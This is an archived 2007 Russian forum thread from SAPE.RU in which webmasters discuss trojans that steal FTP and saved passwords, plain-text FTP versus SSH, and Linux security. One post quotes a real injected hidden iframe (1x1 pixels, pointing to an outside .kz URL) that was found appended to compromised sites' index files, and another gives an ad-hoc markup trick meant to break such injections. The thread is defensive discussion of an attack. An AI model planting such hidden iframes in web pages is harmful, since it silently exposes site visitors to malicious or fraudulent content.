Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Вопросы по работе системы (http://forum.sape.ru/forumdisplay.php?f=13)
-   -   Справка по антивирусному обеспечению (http://forum.sape.ru/showthread.php?t=2958)

sova 04.09.2007 10:33

ЗЫ по поводу ftp клиентов, ломают не шифрование паролей в записной книжке или самом клиенте, а снимают пароль в чистом виде на стадии подключения к серверу
Пароль идет в открытом виде
Поэтому если у вас есть доступ к каталогу сайта по ssh то надо использовать его и scp (secure copy).

товарисч 04.09.2007 10:36

для этого надо сидеть на канале между клиентом и сервером.
Если клиент не по WiFi нешифрованному сидит - то такое возможно только провайдером.
а там другая грабля - на инетрфейсе нереально много пакетов... заколебёшься внужные искать.
хотя - всё автоматизируется

sova 04.09.2007 10:41

Цитата:

Сообщение от товарисч (Сообщение 38455)
для этого надо сидеть на канале между клиентом и сервером.
Если клиент не по WiFi нешифрованному сидит - то такое возможно только провайдером.
а там другая грабля - на инетрфейсе нереально много пакетов... заколебёшься внужные искать.
хотя - всё автоматизируется


Так троян и будет прокладкой между тобой и сервером в одной сети
Я говорю что нафиг заморачиваться с расшифровками всякими если пароль и так идет открытым видом =)

Зы
если кому интересно почитайте тут как использовать ssh
http://sova.unica.by/doc/ssh/
вопросы будут задавайте

seocore 04.09.2007 11:53

Цитата:

Сообщение от sova (Сообщение 38453)
ЗЫ по поводу ftp клиентов, ломают не шифрование паролей в записной книжке или самом клиенте, а снимают пароль в чистом виде на стадии подключения к серверу
Пароль идет в открытом виде
Поэтому если у вас есть доступ к каталогу сайта по ssh то надо использовать его и scp (secure copy).

что вы паритесь, смех один:
1) троян просто достает пароли из .ini файла Total Commander'а в корне винды
2) кроме этого троян берет пароли аськи и все что в компе есть, включая даже менеджеры паролей FF и Оперы

поймите если пароль где-то записан в компе - то это уже не секьюрно по той причине - что профи просто проанализировав механизм работы менеджера паролей той или иной программы - довольно быстро напишут механизм декодирования этих паролей

по поводу троянов, вирусов и т.п. - Линух, БЗДя и прочие nix'ы такая же хорошая среда для них, просто в виду своей непопулярности в народе эту среду не облюбовали вирусо-трояно писатели ...

кстати - рекурсивно удалить файлы на всем диске можно в линухе, более того можно тупо устроить рекурсивно chmod на / с соответствующими правами, чтобы уложить всю машину...

по поводу дыр - так их полно в линухе, буквально каждую неделю открывают новую дыру которая позволяет простому юзеру получить рутовые права, так что по поводу безопасности не надо грузить народ :)

Ank 04.09.2007 14:33

Так. В курилку - оба.

Veles 05.09.2007 10:27

Цитата:

Сообщение от mysql (Сообщение 24186)
Доброго времени!

Имею ряд сайтов, подключенных к всеми уважаемой системе SAPE.
Но 2 дня назад обнаружил интересную вещь: почти на всех этих сайтах в конец файлов index.html, index.htm, index.php (где что есть) кем-то был добавлен следующий код после тэга </HTML>:
Код:

<iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe><iframe src="http://autobazar.kz/ini.php" width=1 height=1></iframe>
Соответственно, при заходе на страницы сайтов это код прокачивает партнерки гугла, бегуна и т.п...

Для профилактики можно поставить на страницах сразу (без пробелов) после тега </html>

<noindex><a href="http://etosaglushkaprotivtrojanov.com/" rel="nofollow">этозаглушкапротиврекламныхтроянов

Без закрывающего тега </a>. И любые <!-- 0123456789 --> сами себя закроют. А Яндекс <noindex> без закрышки исполняет.

Или какой-нибудь скрипт, типа
<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
web = "http://www";
site = "etosaglushkaprotivtrojanov.com";
document.write('<a target=_blank href=\"' + web + '.' + site + '\">');
document.write(web + '.' + site + '</a>');

бла-бла-бла

// End --></SCRIPT>

Троян в него должен ввалиться.
Да, много чего можно придумать, чтобы каждый день индексы не шерстить.

maxispeed 13.09.2007 22:19

Если админы не сочтут рекламой.....
про лечение и защиту от вирусов хорошо могут объяснить тут www.virusinfo.info я уже раза 3 к ним попадал (последний раз вчера из за описаного мной в теме Вирусы вирусы)

К админам: сорри если здесь это считается рекламой.

sergun4ik 28.10.2007 20:02

когда меня посетила сея беда, на форуме одном непомню каком нашел запись что наехали на одного чела что я кобы он давал объявы что продает ифрейм для загрузки.

(50баков за 1000 чтоли)

вобщем бало на этом рубят
и пока будут бабло платить за загрузку на ничегонеподозревающего пк юзера будут такие трояны и будут у нас проблемы.

и кода фтп все перекроют и не будут пароли капать на их мыло то
кодеры будут массово переходить на популярные движки и вставлять свой злой код прямо в дырку вашего двига и при этом не воруя у нас ни чего.

windtalker 28.10.2007 23:13

эмм .... а как же Linux ? имхо панацея ...

muxa 28.10.2007 23:17

Цитата:

Сообщение от windtalker (Сообщение 52294)
эмм .... а как же Linux ? имхо панацея ...

ага, есть у меня знакомый пингвиноид

от него давеча по аське пришла просьба послать СМС на короткий номер типа что-то получитьв ответ и пересдать ему.

вы уж прсотите несчастного маздайщика, но не верю я такие чудеса.

сразу позвонил по телефоне, а он такой грустный... аську видители спёрли.

такая вот поучительная история :)


Часовой пояс GMT +3, время: 12:46.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.